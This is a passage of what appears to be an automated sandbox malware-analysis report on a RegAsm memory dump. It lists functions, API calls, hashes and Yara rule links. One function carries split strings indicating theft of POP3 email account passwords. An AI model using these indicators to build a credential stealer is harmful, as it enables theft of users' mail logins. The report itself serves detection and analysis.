                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Info
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                      • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                                      • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                                                                                                      Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 250 10005f19-10005f3b call 10005c45 252 10005f40-10005f47 250->252 253 10005f70-10005f8a call 10005fa1 LCMapStringW 252->253 254 10005f49-10005f6e 252->254 258 10005f90-10005f9e call 10002ada 253->258 254->258
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String
                                                                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                                                                      • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                      • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                                      • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                                                                                                      Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 262 10005d5c-10005d7e call 10005c45 264 10005d83-10005d8a 262->264 265 10005d9b TlsAlloc 264->265 266 10005d8c-10005d99 264->266 267 10005da1-10005daf call 10002ada 265->267 266->267
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Alloc
                                                                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                                                                      • API String ID: 2773662609-671089009
                                                                                                                                                                                                                      • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                                      • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                                                                                                                      Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 272 10003af1-10003b06 call 10003a82 274 10003b0b-10003b12 272->274 275 10003b24-10003b26 TlsAlloc 274->275 276 10003b14-10003b23 274->276
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                                                                      • API String ID: 2742660187-671089009
                                                                                                                                                                                                                      • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                                                      • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                                                                                                                      Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 279 10006e20-10006e44 call 100069f3 282 10006e54-10006e5b 279->282 283 10006e46-10006e4f call 10006a66 279->283 285 10006e5e-10006e64 282->285 290 10007001-10007010 call 10002ada 283->290 287 10006f54-10006f73 call 10002c40 285->287 288 10006e6a-10006e76 285->288 297 10006f76-10006f7b 287->297 288->285 291 10006e78-10006e7e 288->291 294 10006e84-10006e8a 291->294 295 10006f4c-10006f4f 291->295 294->295 299 10006e90-10006e9c IsValidCodePage 294->299 296 10007000 295->296 296->290 300 10006fb2-10006fbc 297->300 301 10006f7d-10006f82 297->301 299->295 302 10006ea2-10006eaf GetCPInfo 299->302 300->297 307 10006fbe-10006fe5 call 100069b5 300->307 303 10006f84-10006f8a 301->303 304 10006faf 301->304 305 10006eb5-10006ed6 call 10002c40 302->305 306 10006f39-10006f3f 302->306 308 10006fa3-10006fa5 303->308 304->300 319 10006ed8-10006edf 305->319 320 10006f29 305->320 306->295 310 10006f41-10006f47 call 10006a66 306->310 317 10006fe6-10006ff5 307->317 312 10006fa7-10006fad 308->312 313 10006f8c-10006f92 308->313 324 10006ffd-10006ffe 310->324 312->301 312->304 313->312 318 10006f94-10006f9f 313->318 317->317 325 10006ff7-10006ff8 call 10006acb 317->325 318->308 322 10006ee1-10006ee6 319->322 323 10006f02-10006f05 319->323 326 10006f2c-10006f34 320->326 322->323 327 10006ee8-10006eee 322->327 329 10006f0a-10006f11 323->329 324->296 325->324 326->325 330 10006ef6-10006ef8 327->330 329->329 331 10006f13-10006f27 call 100069b5 329->331 332 10006ef0-10006ef5 330->332 333 10006efa-10006f00 330->333 331->326 332->330 333->322 333->323
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 546120528-0
                                                                                                                                                                                                                      • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                                                      • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                                                                                                      Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 336 10006c5f-10006c89 call 10005af6 call 10006d7e call 100069f3 343 10006c8b-10006c8d 336->343 344 10006c8f-10006ca4 call 100056d0 336->344 345 10006ce2-10006ce5 343->345 348 10006cd4 344->348 349 10006ca6-10006cbc call 10006e20 344->349 351 10006cd6-10006ce1 call 1000571e 348->351 352 10006cc1-10006cc7 349->352 351->345 354 10006ce6-10006cea 352->354 355 10006cc9-10006cce call 10006368 352->355 357 10006cf1-10006cfc 354->357 358 10006cec call 10007bbc 354->358 355->348 361 10006d13-10006d2d 357->361 362 10006cfe-10006d08 357->362 358->357 361->351 365 10006d2f-10006d36 361->365 362->361 364 10006d0a-10006d12 call 1000571e 362->364 364->361 365->351 367 10006d38-10006d4f call 100068c9 365->367 367->351 371 10006d51-10006d5b 367->371 371->351
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                        • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                                                                        • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                                                                        • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2991157371-0
                                                                                                                                                                                                                      • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                                                      • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                                                                                                      Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 372 10001eec-10001ef5 373 10001ef7-10001efa 372->373 374 10001f2a-10001f35 dllmain_crt_process_detach 372->374 376 10001f1c-10001f28 dllmain_crt_process_attach 373->376 377 10001efc-10001eff 373->377 375 10001f3a 374->375 378 10001f3b-10001f3c 375->378 376->375 379 10001f01-10001f04 377->379 380 10001f12 call 100023ec 377->380 381 10001f06-10001f09 379->381 382 10001f0b-10001f10 call 1000240b 379->382 385 10001f17-10001f1a 380->385 381->378 382->385 385->378
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                                                      • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3750050125-0
                                                                                                                                                                                                                      • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                                      • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                                                                                                      Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 387 100038e8-100038ed call 10003af1 389 100038f2-100038fb 387->389 390 10003900-1000390f call 10003ba2 389->390 391 100038fd-100038ff 389->391 394 10003911-10003916 call 1000391b 390->394 395 10003918-1000391a 390->395 394->391
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 806969131-0
                                                                                                                                                                                                                      • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                                      • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                                                                      Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __crt_fast_encode_pointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3768137683-0
                                                                                                                                                                                                                      • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                                                      • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                      • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                                      • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                                                      Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                      • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                                      • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                                                      Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                                                                                      • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                                      • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                                                                      Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                      • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                                                      • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                                                                                                      Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                      • API String ID: 4218353326-3023110444
                                                                                                                                                                                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                      • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
